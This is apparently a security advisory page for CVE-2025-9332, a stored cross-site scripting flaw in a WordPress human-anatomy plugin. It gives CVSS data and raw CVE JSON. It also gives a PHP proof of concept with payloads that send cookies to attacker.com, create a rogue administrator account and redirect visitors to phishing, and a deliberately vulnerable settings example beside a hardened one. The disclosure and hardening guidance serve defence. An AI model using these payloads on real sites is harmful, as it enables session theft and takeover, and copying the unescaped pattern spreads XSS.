Security Vulnerability Report
CVE-2025-9332 CVSS 5.5 MEDIUM

CVE-2025-9332

Published: 2025-10-03 12:15:48
Last Modified: 2026-04-15 00:35:42

Description

The Interactive Human Anatomy with Clickable Body Parts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Interactive Human Anatomy with Clickable Body Parts < 2.6
Interactive Human Anatomy with Clickable Body Parts = 2.6 (and all earlier versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
PHP
<?php
/**
 * CVE-2025-9332 - Stored XSS PoC for WordPress Interactive Human Anatomy Plugin
 *
 * This PoC demonstrates how an authenticated administrator can inject
 * malicious JavaScript through the plugin's admin settings page.
 *
 * Note: Requires administrator-level access to exploit.
 */

// Step 1: Authenticate as administrator (already logged in via browser)
// Step 2: Navigate to the plugin settings page
// Step 3: Inject malicious payload into one of the settings fields

// Example malicious payloads to inject into admin settings fields:

// Payload 1: Cookie stealing
$payload_1 = '<script>new Image().src="https://attacker.com/steal?c="+document.cookie;</script>';

// Payload 2: Create new admin account
$payload_2 = '<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "/wp-admin/user-new.php", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("action=createuser&_wpnonce_create-user=&user_login=hacker&[email protected]&pass1=Password123!&pass2=Password123!&role=administrator");
</script>';

// Payload 3: Defacement / Redirect
$payload_3 = '<script>document.location="https://attacker.com/phishing";</script>';

// Step 4: Submit the form - payload is stored in database
// Step 5: When any user visits the page with the plugin, payload executes

// Automated exploitation example using cURL (requires valid admin cookies):
/*
curl -X POST "https://target.com/wp-admin/admin.php?page=interactive-medical-drawing" \
  -b "wordpress_logged_in_cookie=YOUR_COOKIE" \
  -d "setting_field=<script>alert('XSS')</script>&submit=Save"
*/

// Detection: Search for unescaped output in plugin source code
// (the dollar signs are escaped so PHP prints the pattern literally instead
// of interpolating an undefined $user_input variable)
echo "Look for patterns like: echo \$user_input; or print(\$user_input);\n";
echo "Without proper escaping functions like esc_html(), esc_attr(), esc_url()\n";
?>
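The detection note at the end of the PoC points at the actual defect: settings values written to the options table without sanitization and printed without escaping. The following added example, written for this page and not taken from the plugin or the advisory, shows a minimal WordPress settings field in that vulnerable shape beside a hardened version built on the Settings API. Option, group and function names prefixed iha_demo_ are hypothetical; register_setting, sanitize_text_field, wp_kses_post, wp_strip_all_tags, esc_attr, settings_fields, submit_button and current_user_can are real WordPress core functions. The unfiltered_html branch is why the advisory limits the impact to multisite and to sites where that capability has been disabled: on a single-site install WordPress grants administrators unfiltered_html, so they can already store script through core, whereas on multisite only super admins hold it and a plugin that stores raw markup for ordinary administrators bypasses a boundary core otherwise enforces.

```php
<?php
/**
 * Added example for CVE-2025-9332 (not the plugin's own code).
 * A settings field stored and rendered two ways: the vulnerable shape
 * the advisory describes, and a hardened shape. Names prefixed
 * iha_demo_ are hypothetical; everything else is WordPress core API.
 */

// ---- Vulnerable shape: raw value stored, raw value printed -------------

function iha_demo_save_vulnerable() {
    if ( isset( $_POST['iha_demo_caption'] ) ) {
        // No sanitization: the submitted string, <script> tags included,
        // goes straight into the options table.
        update_option( 'iha_demo_caption', wp_unslash( $_POST['iha_demo_caption'] ) );
    }
}

function iha_demo_render_vulnerable() {
    $caption = get_option( 'iha_demo_caption', '' );
    // No escaping: stored markup is emitted into an attribute and the
    // element body unchanged, so it runs for every visitor of the page.
    echo '<div class="caption" title="' . $caption . '">' . $caption . '</div>';
}

// ---- Hardened shape: sanitize on save, escape on output ----------------

function iha_demo_sanitize_caption( $value ) {
    if ( ! is_string( $value ) ) {
        return '';
    }
    // Users holding unfiltered_html (single-site administrators by default,
    // super admins only on multisite) may keep allowlisted HTML; everyone
    // else is reduced to plain text. wp_kses_post() drops <script> elements
    // and on* event handler attributes either way.
    if ( current_user_can( 'unfiltered_html' ) ) {
        return wp_kses_post( $value );
    }
    return sanitize_text_field( $value );
}

function iha_demo_register_settings() {
    // The Settings API runs sanitize_callback on every save that goes
    // through options.php, so a raw value never reaches update_option().
    register_setting(
        'iha_demo_group',
        'iha_demo_caption',
        array(
            'type'              => 'string',
            'sanitize_callback' => 'iha_demo_sanitize_caption',
            'default'           => '',
        )
    );
}
add_action( 'admin_init', 'iha_demo_register_settings' );

function iha_demo_render_hardened() {
    $caption = get_option( 'iha_demo_caption', '' );
    // Escape per output context even though the value was sanitized on save:
    // esc_attr() for the attribute (tags stripped first, since an attribute
    // cannot carry markup), wp_kses_post() for the element body.
    echo '<div class="caption" title="' . esc_attr( wp_strip_all_tags( $caption ) ) . '">'
        . wp_kses_post( $caption )
        . '</div>';
}

// The settings form posts to options.php and carries the Settings API
// nonce and hidden fields, so capability and nonce checks happen in core.
function iha_demo_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    echo '<form method="post" action="options.php">';
    settings_fields( 'iha_demo_group' );
    echo '<input type="text" name="iha_demo_caption" value="'
        . esc_attr( get_option( 'iha_demo_caption', '' ) ) . '">';
    submit_button();
    echo '</form>';
}
```

When auditing a plugin for this class of bug, the two places to read are the save path (is there a sanitize_callback or an explicit sanitize_*() call before update_option()?) and every echo of get_option() output (is the value wrapped in the esc_*() or wp_kses_*() function matching its HTML context?). A value that is clean in the database but printed raw is still exploitable the moment another save path forgets to sanitize, which is why the hardened version does both.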

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-9332",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-03T12:15:47.933",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Interactive Human Anatomy with Clickable Body Parts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wordpress.org/plugins/interactive-medical-drawing-of-human-body/#developers",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/445e762c-7e90-4994-8542-31a84bc91388?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}